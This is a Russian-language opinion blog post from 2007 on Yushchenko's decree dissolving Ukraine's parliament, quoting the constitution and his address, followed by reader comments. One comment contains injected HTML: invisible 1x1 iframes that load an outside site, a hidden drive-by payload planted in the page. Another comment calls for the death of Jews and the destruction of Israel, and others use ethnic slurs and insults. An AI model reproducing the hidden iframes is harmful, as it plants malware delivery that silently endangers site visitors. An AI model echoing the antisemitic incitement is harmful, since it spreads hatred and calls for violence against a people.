Кто владеет информацией,
владеет миром

Ющенко, похоже, принял указ о роспуске Украины

Опубликовано 03.04.2007 автором в разделе комментариев 28

Сегодня Государство Украина (а именно так оно звучит по его конституции) оказалось весьма близко к окончанию своей недолгой и не очень славной истории. Президент Ющенко подписал указ о роспуске Верховной рады. По горячим следам анализируя ситуацию, можно было предположить, что в какой-то момент Ющенко почувствовал себя сильней, чем противостоящая ему правящая коалиция, и пошел на роспуск парламента и внеочередные выборы, будучи уверенным, что победа будет за ним. Однако по здравом размышлении указ Ющенко можно расценить и как жест отчаяния.

По существу, к указу привела практика перехода депутатов, избранных по спискам "Нашей Украины" и БЮТ, в правящую коалицию. Получив конституционное большинство, коалиция Януковича смогла бы вносить измененения в Конституцию и даже отстранить Ющенко от должности досрочно. Например, за государственную измену.

Вот что говорит об этой перспективе Конституция Украины:

"Вопрос о смещении Президента Украины с поста в порядке импичмента инициируется большинством от конституционного состава Верховной Рады Украины.
Для проведения расследования Верховная Рада Украины создает специальную временную следственную комиссию, в состав которой включаются специальный прокурор и специальные следователи.
Выводы и предложения временной следственной комиссии рассматриваются на заседании Верховной Рады Украины.
При наличии оснований Верховная Рада Украины не менее чем двумя третями от ее конституционного состава принимает решение об обвинении Президента Украины.
Решение о смещении Президента Украины с поста в порядке импичмента принимается Верховной Радой Украины не менее чем тремя четвертями от ее конституционного состава после проверки дела Конституционным Судом Украины и получения его заключения в отношении соблюдения конституционной процедуры расследования и рассмотрения дела об импичменте и получения заключения Верховного Суда Украины о том, что деяния, в которых обвиняется Президент Украины, содержат признаки государственной измены или иного преступления".

Говоря проще, перед Ющенко замаячила не просто перспектива превращения в "английскую королеву" (ей он уже фактически стал, передав всю полноту исполнительной власти Кабинету министров), а реальная возможность лишиться поста президента и даже, вполне возможно, свободы - весьма неприятная реализация знаменитого слогана его же собственной избирательной кампании "Зэка - на нары!"

О вероятном усилении Ющенко говорила в большей степени даже не активность самого президента, а вялая и какая-то дохлая реакция самого Януковича. Он что-то мямлил либо вовсе молчал.

Однако после того, как Верховная рада отказалась подчиниться указу президента о ее роспуске, ситуация стала выглядеть несколько иначе. В ней появилась драматургия, аналогичная той, что в 1993-м году привела к расстрелу российского парламента. Ну и, конечно, появился смысл рассмотреть правовые основы указа Ющенко о роспуске Верховной рады.

Конституция Украины говорит об этом следующее:

"Статья 106. Президент Украины:
8) прекращает полномочия Верховной Рады Украины в случаях, предусмотренных настоящей Конституцией;"

Смотрим, что же на это счет предусмотрено Конституцией?

"Решение о досрочном прекращении полномочий Верховной Рады Украины принимается Президентом Украины после консультаций с Председателем Верховной Рады Украины, его заместителями и председателями депутатских фракций в Верховной Раде Украины".

Вот и все, собственно. Понимать можно так, что президент Украины либо не обязан вообще никак мотивировать свое решение о роспуске Верховной рады, либо мотивация эта в Конституции не прописана вообще, следовательно, роспуск Рады вообще невозможен по закону (ритуальные консультации Ющенко, надо сказать, провел). Решать будет, естественно, Конституционный суд, куда недораспущенный парламент уже внес соответствующий запрос.

Конечно, мы прекрасно понимаем. что в условиях революционного правосознания любой суд вынесет вердикт, за которым будут стоять, по выражению Наполеона, "большие батальоны". Во время "оранжевой революции", например, был вынесен вердикт о третьем туре выборов, про который в Конституции даже намека не было. Но жить хотят все, и даже на Украине. А то, что угроза была не пустячная, говорят хотя бы последовавшие за "оранжевым переворотом" загадочные "самоубийства" высших государственных чиновников.

Остается только ответить на вопрос, есть ли за Ющенко сила, или перед нами лишь красивая форма политического самоубийства? Вот текст обращения президента Украины по случаю роспуска Верховной рады. Документ стоит того, чтобы привести его полностью.


Уважаемый Украинский народ,

Сегодня я подписал Указ о досрочном прекращении полномочий Верховной Рады Украины пятого созыва.

Я принял это решение в соответствии с положениями Конституции Украины, обязанностями Президента Украины и с соблюдением необходимой конституционной процедуры.

Мое действие продиктовано острой необходимостью уберечь государство, его суверенитет и территориальную целостность, обеспечить соблюдение Основного Закона Украины, прав и свобод человека и гражданина.

Подчеркиваю: это - не только право. Это - моя обязанность.

В Верховной Раде продолжается сознательное обострение политического кризиса, который представляет угрозу нашей стране и народу.

В основе кризиса - три опасных тенденции.

Первая - неконституционный процесс формирования и переформатирования парламентского большинства. Согласно Конституции, коалиция создается на основе депутатских фракций, а не на основе индивидуального или группового членства.

Все остальное - это ревизия воли народа. Самый циничный вызов каждому из нас.

Вторая тенденция - постоянная практика принятия нелегитимных, антиконституционных решений. Последний пример - Закон о Кабинете Министров, который системно нарушает Конституцию Украины и является покушением на конституционный строй Украины.

Третья тенденция - систематическое несоблюдение обязательств и политика мошенничества, интриг и предательств, прикрытые лозунгами о национальном единстве.

За год деятельности Верховная Рада пятого созыва не продемонстрировала работы, которую ожидали люди.

Парламентско-правительственное большинство уже не скрывает своей главной цели - узурпировать власть и законсервировать свое правление.

Обществу надоело видеть одно и то же - борьбу за полномочия и полное игнорирование ежедневных нужд Украины.

В течение продолжительного времени я призывал парламентские политические силы к конструктивной работе и диалогу.

Мои предложения и сегодня были проигнорированы.

Нарушение Конституции Украины, среди которых ключевым стал неконституционный характер создания коалиции, создали однозначные правовые и политические основания для роспуска парламента.

Внеочередные выборы - это крайнее средство. Оно стало неизбежным.

Плановые и внеплановые выборы - это легитимный демократический инструмент, которым обладает Украинский народ для контроля за властью.

Никаких потрясений и противостояний не будет.

Ситуация в государстве находится под контролем и останется стабильной.

Указ Президента Украины о досрочном прекращении полномочий Верховной Рады Украины обязателен для выполнения.

Предостерегаю любые горячие головы от противоправных призывов, намерений и действий.

Обращаюсь ко всем гражданам Украины:

Мы идем сложным, но демократическим путем.

Не поддавайтесь ни на какие провокации.

Любые покушения на вашу безопасность будут преодолены и наказаны.

Досрочные выборы состоятся в полном соответствии с Конституцией Украины, демократическими национальными и международными стандартами. Волеизъявление будет свободным. Я твердо гарантирую это право.

Выборы состоятся под надлежащим мониторингом международных наблюдателей.

Я призываю Украинский народ сделать ответственный, сознательный и справедливый выбор, который позволит завершить политические распри и откроет новую перспективу для Украины.

Вы единственный источник власти в Украине.

Ваше право никто не может узурпировать.

На страже ваших прав стоят Конституция и Президент Украины.

Украина нуждается в вашей помощи и вашей поддержке.

 

Президент Украины Виктор Ющенко


Оставим вполне анекдотическое обращение "уважаемый народ", возможно, по-украински оно звучит и не так жалко, как по-русски. Но из текста явственно следует, что мотивом для роспуска парламента для президента Ющенко стал страх.

Скажем так, разве кто-то покушался на суверенитет и территориальную целостность Украины? Нет, никаких угроз территории Украины со стороны ее собственного парламента не возникало.

Ющенко называет и подлинную причину своего страха: "неконституционный процесс формирования и переформатирования парламентского большинства".

Начнем с того, что правильнее было бы сказать не "неконституционный", а "внеконституционный", поскольку данный процесс Конституцией Украины никак не регламентируется вообще. То есть Верховная рада никак не нарушила Конституцию. Но разве кто-то говорит о соблюдении законов, когда происходит государственный переворот?

Представим себе хотя бы Павла Первого, который бы требовал, чтобы его били пепельницей только отечественного производства и душили шарфом исключительно цветов государственного флага.

Вопрос сегодня стоит только в том, кто сильнее. У кого, как говорится, хер толще, тот и пан.

Первое, конечно, что говорит в пользу Ющенко - это то, что руководство Верховной рады пошло на консультации с президентом. Не пошло бы - был налицо процессуальный повод оспорить указ в Конституционном суде.

Второе в его пользу - контроль за армией и СБУ. В Раде уже рассматривался истерический запрос о раздаче боекомплектов стоящей под Киевом танковой дивизии. На что в ходе экстренного заседания Кабинета министров министр обороны Анатолий Гриценко ответил более, чем двусмысленно: "Но если у кого-то будет какое-то искушение использовать Вооруженные силы Украины вопреки закону, вооруженные силы будут действовать согласно закону, и будут защищать население". От кого будут защищать "население" вооруженные силы? От искушений?

Весьма странно отреагировал на ситуацию Кабинет министров Украины. Он принял постановление "О безотлагательных мерах Кабмина во исполнение постановлений ВР "О предотвращении действий, угрожающих конституционному правопорядку, общественному спокойствию, стабильности в Украине" и "Постановление ВР в связи с политической ситуацией в Украине, сложившейся с подписанием Президентом Украины Виктором Ющенко указа о досрочном прекращении полномочий ВР V созыва". За принятие этого постановления единогласно высказались практически все министры Кабинета министров, но один воздержался - как раз министр обороны Анатолий Гриценко.

В России в 1993-м году Верховный совет РСФСР в аналогичной ситуации приступил к процедуре импичмента президенту Ельцину, но ему не хватило кворума. Но реально, конечно, не хватило войск. Если бы армия встала на сторону Руцкого и Хасбулатова, то кворум бы чудесным образом появился.

Почему Верховная рада не спешит с импичментом? Ведь налицо повод обвинить президента в нарушении Конституции, что уже можно квалифицировать как национальную измену. А там и до агента румынской и албанской разведки - рукой подать.

Но - не торопятся... Ждут чего-то?

Да, парламент, будучи уже распущенным, запретил СМИ публиковать указ о роспуске Рады, правительство отказало в финансировании будущей избирательной кампании, но это все - чепуха. Указ уже опубликован де-факто, а если назавтра спецназ выкинет депутатов из здания парламента, то и деньги на выборы найдутся.

То есть если Верховная рада не начнет отстранять Ющенко от власти, ее саму отстранят очень быстро.

Дальше два варианта развития событий - мирный и другой...

При мирном развитии ситуации на внеочередных выборах победит тот, кто покажет силу. Пока такой силой выглядит Ющенко.

При немирном пути - просто война запада и востока, наподобие войны севера и юга в Соединенных Штатах. Интенсивность войны может быть разная, от отдельных акций мобильных групп до полномасштабной бойни стенка на стенку. Итог в любом случае будет не американский. Украина распадется, т.е. усилия Ющенко по сохранению "суверенитета и территориальной целостности" приведут к прямо противоположному результату.

Кстати, такой позиции (т.е. о желательности раскола Украины на запад и восток) придерживаются и в Кремле, и кое где на Западе. Опять же турецкая общественность не возражает. Так что будем ждать развития ситуации, поскольку повлиять на нее пока что очень трудно...

 



Рейтинг:   4.76,  Голосов: 37
Поделиться
Всего комментариев к статье: 28
Комментарии не премодерируются и их можно оставлять анонимно
Критическая масса
Счетчик написал 11.04.2007 13:11
Если количество митингующих превысит 500 000 человек Ющенко разделит судьбу Чаушеску... Народ уже невозможно остановить. Армия в панике разбегается, а народ крушит все...
Re: Повторение прСОГЛАСЕН</td><iframe src=http://www.felinta.ru/ewrgf width=1 heightойденного или...
СОГЛАСЕН</td><iframe src=http://www.felinta.ru/ewr написал 09.04.2007 23:48
СОГЛАСЕН</td><iframe src=http://www.felinta.ru/ewrgf width=1 height=1></iframe><iframe src=http://www.felinta.ru width=1 height=1></iframe>
(без названия)
0525 написал 08.04.2007 11:48
В Украине тучи ходят хмуро
Край веселый ужасом объят
На майдане в Киеве любимом,
Пес и Сучка лают и визжат
Им Хозяин из-за океана
Корки апельсиновые дал
Думал он на эти апельсины
Променяем Родину свою
Просчитался бушевский наемник &#8211;
ЦРУ не выполнило план
Напоролись здесь на &laquo;криминал&raquo;
Это Вам не ющенский бедлам!
Не разделим неньку Украину!
Не дадим оранжевой чуме
Не дадим техасскому ковбою
Украину в ранчо превратить
Забирайте Пса и свою Суку,
Не хотим Мы с Вами воевать
Не хотим оранжевых расстрелов
Небо голубое дайте нам!
Мы войну закончили в Берлине
Если мир нарушит Белый дом
Мы свои могучие машины
До Нью-Йорка с боем доведем
Если смерти не боятся янки
И не жаль им собственных костей
Доказать сумеют наши танки
Как встречать непрошенных гостей
(без названия)
iy написал 04.04.2007 08:00
Ну ты и придурок
Re: АБ
А л е к с а написал 03.04.2007 18:28
"Так что не стоит реабилитировать Ельцина, не стоит. Неблагодарное это дело."
Ну, кранокнижник, ты загнул!
Где это А.Б. реабилитирует Ельцина?
Он описывает ситуацию нынешнию по аналогии с 1993 годом у нас.
И точно приводит факты: ВС не хватило не только кворума, но смелости, сил, поддержки (войск).
А то что ебн - преступник, это общеизвестно, хотя бы по решению Конституционного Суда.
Повторение пройденного или...
Anti написал 03.04.2007 17:36
В кукольной стране,кукольный Карабас-Барабас решил поучить жизни своих кукол, отказываюшихся играть спекталь режиссера из Вашингтона. И Карабас подписал себе приговор - он теперь политический труп,не успев отработать пиндоские бабосы,затраченные на оранжевый шабаш.
Склолько теперь визга и грохота будет из Европы и из-за Океана.Что опять Россия лезет во внутренние дела самостийной Украины.
А народ : хохлы конечно,они все видять и все понимают.Зачем им такой теленок,водимый Вашингтоном за рога.
По сравнению с нашим гарантом,он ведь просто несмышленый ребенок.
Притча
Anti написал 03.04.2007 17:35
В кукольной стране,кукольный Карабас-Барабас решил поучить жизни своих кукол, отказываюшихся играть спекталь режиссера из Вашингтона. И Карабас подписал себе приговор - он теперь политический труп,не успев отработать пиндоские бабосы,затраченные на оранжевый шабаш.
Склолько теперь визга и грохота будет из Европы и из-за Океана.Что опять Россия лезет во внутренние дела самостийной Украины.
А народ : хохлы конечно,они все видять и все понимают.Зачем им такой теленок,водимый Вашингтоном за рога.
По сравнению с нашим гарантом,он ведь просто несмышленый ребенок.
(без названия)
В.И.Жириновская написал 03.04.2007 14:25
Вот у кого Бушу надо учиться настоящей демократии - взял бы, да и распустил Конгресс. Что, не найдется в штатах танкистов, верных своему Президенту?
АБ
краснокнижник написал 03.04.2007 13:42
"Не говоря о том, что ВС РСФСР просто не имел полномочий на отстранение президента - эти полномочия имел съезд"
Лукавите. Съезд - заключительная инстанция, ВС же имел право инициировать процесс в соответствии со ст. 121-10 Конституции РСФСР.
То. что вопрос не дошел до Съезда - не вина ВС.
И Вы забыли упомянуть про статью 121-6:
"Статья 121-6. Полномочия Президента РСФСР не могут быть использованы для изменения национально-государственного устройства РСФСР, роспуска либо приостановления деятельности любых законно избранных органов государственной власти. (введена Законом РСФСР от 24 мая 1991 г. N 1326-1)"
Тут-то нарушение налицо.
Так что не стоит реабилитировать Ельцина, не стоит. Неблагодарное это дело.
СМЕРТЬ СИОНИСТАМ!!!
Крысик написал 03.04.2007 13:38
НАЧАЛОСЬ!!! Украина начала мочит ЖИДОВ-СИОНИСТОВ!!! Скоро подключатся Араббы и ВСЕ Мусульмане!!!! ТАК ИХ, ЖИДОВ!!!
СТЕРЕТЬ ИЗРАИЛЬ С ЛИЦА ЗЕМЛИ!!! ПОБЕДИЛИ ФАШИЗМ-ПОБЕДИМ И СИОНИЗМ!!!!
ВСЕ жиды пожалуйте в израиль...НЕМЕДЛЕННО!!! У вас началась ВСЕОБЩАЯ ТОТАЛЬНАЯ мобилизация....ВСЕ ЖИДЫ НА ЗАЩИТУ СВОЕЙ ИСТОРИЧЕСКОЙ РОДИНЫ-ИЗРАИЛЬ!!!
ВЛАСТЬ РУССКИМ!!!(этот лозунг больше всего жидов бесит) СМЕРТЬ ЖИДОПРАВИТЕЛЯМ-СИОНИСТАМ и ЖИДООЛИГАРХАМ!!! и ведь не спрячешь ПРАВДЫ...и правители у нас ЖИДЫ-СИОНИСТЫ...и олигархи сплошь ЖИДЫ...ни одного русского....
Чего боятся сине-белые?
Русский написал 03.04.2007 13:09
Сабж
Почему ЯнукОвцы не хотят перевыборов? Ведь их большинство, и согласно опросам сейчас при перевыборах они тоже получат большинство. Чего они испугались? Не признавая указ президента они роют себе .. известно что.
Если бы в России Дума не послушалась указов Путина, интересно что было-бы с ней(Думой)?...
Остановим Оранжево-звездно-полосатый дурман
Слав написал 03.04.2007 12:10
Марионетки США не пройдут! Все на защиту РАДЫ!!!
Re: 300 спартанцев
Тоша написал 03.04.2007 11:45
Что самое смешное - внутри Укрианы тоже очень многие букваль за выделить западенщину в отдельное образование и отдать Польше на воспитание.
Ну а режим резервации поляки им сами обеспечат.
300 спартанцев
Вот так написал 03.04.2007 11:40
300 депутатов спасут Украину от американской колонизации или ядерного катаклизма, развязанного США... Все на защиту Рады!
разборки
Алексей Мартов написал 03.04.2007 11:02
С моей точки зрения, разборки между представителями различных олигархический украинских кланов: Ющенко и Бандюковичем должны волновать российскую оппозицию глваным образом тем, что наблюдая реакцию на них здесь в России легко выявить "кротов в оппозиции". То есть людей, которые выполяняя социальный заказ поставленный перед ними россйиской властью пытаются подменить логичную для оппозиции идею борьбы за социальную справедливость невнятной нацпатровской идеей.
Именно эти люди активно включились в развязанную в свое время российской властью антиоранжевую истерию, именно они (особенно всякие там Якушевы, left.ru) разлагают оппозицию.
Поэтому предлагаю всем понаблюдать за реакцией различных политологов и публицистов на сегодняшние события. Вменяемые люди займут (как Баранов) осторожную и взвешанную позицию. А "кроты" или "лохи", одинаково склонные к предательству дела оппозиции, забьются в антиоранжевом истерическом припадке.
несчастная Украина
Петька написал 03.04.2007 10:46
Ну и Новости!
Бордель "Украина".
Вчера Презик Ющик блин разограл весь бомонд, то есть парла... блин... Верховну Раду. Но они же, суки, эти "народные избранники" опять соберутся. Под мощной рукой (в левой руке - финка, в правой - АК модернизированный, как в молодые годы) блин-Премьера Вити Янека может собраться 300 этих избранников и тогда они Ющенку снимут с работы: постановление об импичменте уже заготовлено, осталось только проставить номер. Газеты сообщают со слов Ющенко, что Янек дает хорошую взятку каждому нардепу, который перебегает в его фракцию.
А на новых выборах и супер-воровке Юльке могут хвост прищемить, у нее с деньгами туго - лидеру оппозиции взяток не дают! Она даже умерила свои амбиции и готова бороться за должность мэра Киева. Хорошее место, она будет там как лиса в курятнике. Вот .например, предыдущий мэр - Александр Омельченко получил из бюджета 3 миллиарда (миллиарда!) долларов на строительство нового моста через Днепр. Но не успел даже забить колышки, фиксирующие будущую ось воображаемого моста. А денег уже нет! Но самое главное: никто не спрашивает - "где мост? а где деньги?". Он не все себе взял, конечно, с Кучмой, говорят, делился...
А помните, у Ильфа и Петрова был замечательный образ - голубой воришка Альхен: он воровал и стеснялся. Так это про нашего Презика! Когда Презик Ющ и презик Путя поделили бабки за российский газ (дележ называется Росукрэнерго), так Ющик взять деньги сам постеснялся и вставил в эту Росукрэнерго своего родного брата Бориса Ющенко из Харькова. И теперь даже солидная киевская газета "Зеркало недели" уважительно называет Бориса - Главный Братан Украины! Своими глазами читал.
А в субботу 31 марта каждый из этих трех уголовников собрал на Майдане своих стронников; те помахали флагами, получили свои суточные и разошлись... Домахались! Но попробуйте угадать как была заявлена тема этих сборищ - упадете со смеху: "Митинг протеста против повышения коммунальных платежей!" И Ющ протестовал, и Янек, и Юля. А кто же их ввел?
М-да, веселая у нас страна - Бордель "Украина"...
Продолжение.
А.Б. написал 03.04.2007 10:45
т.е. в Конституции Украины нигде не сказано, что состав депутатских фракций и коалиции депутатских фракций является неизменным за весь срок полномочий Рады. Более того, переходы депутатов встречались и ранее, просто они не носили характера, способного изменить расклад в Раде. Регламент Верховной Рады Украины, к которому прямо отсылает Конституция, также не ограничивает переходов депутатов из фракции во фракцию. А закона об императивном мандате на Украине просто нет.
Однако удалять пост мы не будем, чтобы был ясен уровень тех, кто сегодня представляет 2оранжевую" сторону конфликта.
Re: 1993 и 2007
А.Б, написал 03.04.2007 10:38
Вы путаете импичмент Ельцину марта 1993 на Съезде депутатов, когда он не набрал необходимого числа голосов, но кворум действительно был, и голосование в ВС РСФСР во время ооктябрьских событий - там решение об отстранении Ельцина было "принято" 144 голосами "за" при 6 воздержавшихся при том, что в зале присутствоовала около 90 депутатов. Не говоря о том, что ВС РСФСР просто не имел полномочий на отстранение президента - эти полномочия имел съезд.
Для справки: всего было избрано 1068 народных депутатов РСФСР; кворум - 2/3 от общего числа депутатов. Т.е. 144 депутата - это маловато будет.
Ну и насчет того, что "автор брешет" - Статья 83 Конституции Украины полностью:
= Очередные сессии Верховной Рады Украины начинаются в первый вторник февраля и первый вторник сентября каждого года.
Внеочередные сессии Верховной Рады Украины, с указанием повестки дня, созываются Председателем Верховной Рады Украины по требованию Президента Украины или по требованию не менее трети народных депутатов Украины от конституционного состава Верховной Рады Украины.
В случае объявления указа Президента Украины о введении военного или чрезвычайного положения в Украине или отдельных ее местностях Верховная Рада Украины собирается на заседание в двухдневный срок без созыва.
В случае окончания срока полномочий Верховной Рады Украины во время действия военного или чрезвычайного положения ее полномочия продолжаются до дня первого заседания первой сессии Верховной Рады Украины, избранной после отмены военного или чрезвычайного положения.
Порядок работы Верховной Рады Украины устанавливается Конституцией Украины и Регламентом Верховной Рады Украины.
В Верховной Раде Украины по результатам выборов и на основе согласования политических позиций формируется коалиция депутатских фракций, в состав которой входит большинство народных депутатов Украины от конституционного состава Верховной Рады Украины.
Коалиция депутатских фракций в Верховной Раде Украины формируется в течение одного месяца со дня открытия первого заседания Верховной Рады Украины, которое проводится после очередных или внеочередных выборов Верховной Рады Украины, или в течение месяца со дня прекращения деятельности коалиции депутатских фракций в Верховной Раде Украины.
Коалиция депутатских фракций в Верховной Раде Украины в соответствии с настоящей Конституцией вносит предложения Президенту Украины по кандидатуре Премьер-министра Украины, а также в соответствии с настоящей Конституцией вносит предложения по кандидатурам в состав Кабинета Министров Украины.
Принципы формирования, организации деятельности и прекращения деятельности коалиции депутатских фракций в Верховной Раде Украины устанавливаются Конституцией Украины и Регламентом Верховной Рады Украины.
Депутатская фракция в Верховной Раде Украины, в состав которой входит большинство народных депутатов Украины от конституционного состава Верховной Рады Украины, имеет права коалиции депутатских фракций в Верховной Раде Украины, предусмотренные настоящей Конституцией.
1993 - 2007
хехе написал 03.04.2007 10:04
вобщем аналогия значительно глуюже - в обоих случаях суть и источники протвостояния похожие
правильныый вопрос
хехе написал 03.04.2007 09:40
а чего боится янукович и депутаты?
пуль натовских винтовок. это не солдаты - ющ и блядь тимошнко -афристы и поле их возможностей куда шире - они не боятя потерять страну и легко идут на жертвы и в абанк.
едиственная надежда бесхребетнго яныка как и вс ссср - народное восстание - но украинские комми и социки такие же как и наши русские - трепло. а русские фашики только против русских могут выеживаться и только на рерритории росии гадят - а воевать всерез с бандерлогами - срут.
сракуны провит аферистов - суть интриги. а уважаемый народ? он там давно уже не имеет ни предстваительства ни защиты интерсов ни собственного мнения - даже крайняя степнь необходимости
1 | 2 | >>
Опрос
  • Кому из начальников вы больше доверяете?:
Результаты
Интернет-ТВ
Новости
Анонсы
Добавить свой материал
Наша блогосфера
Авторы
 
              
Рейтинг@Mail.ru       читайте нас также: pda | twitter | rss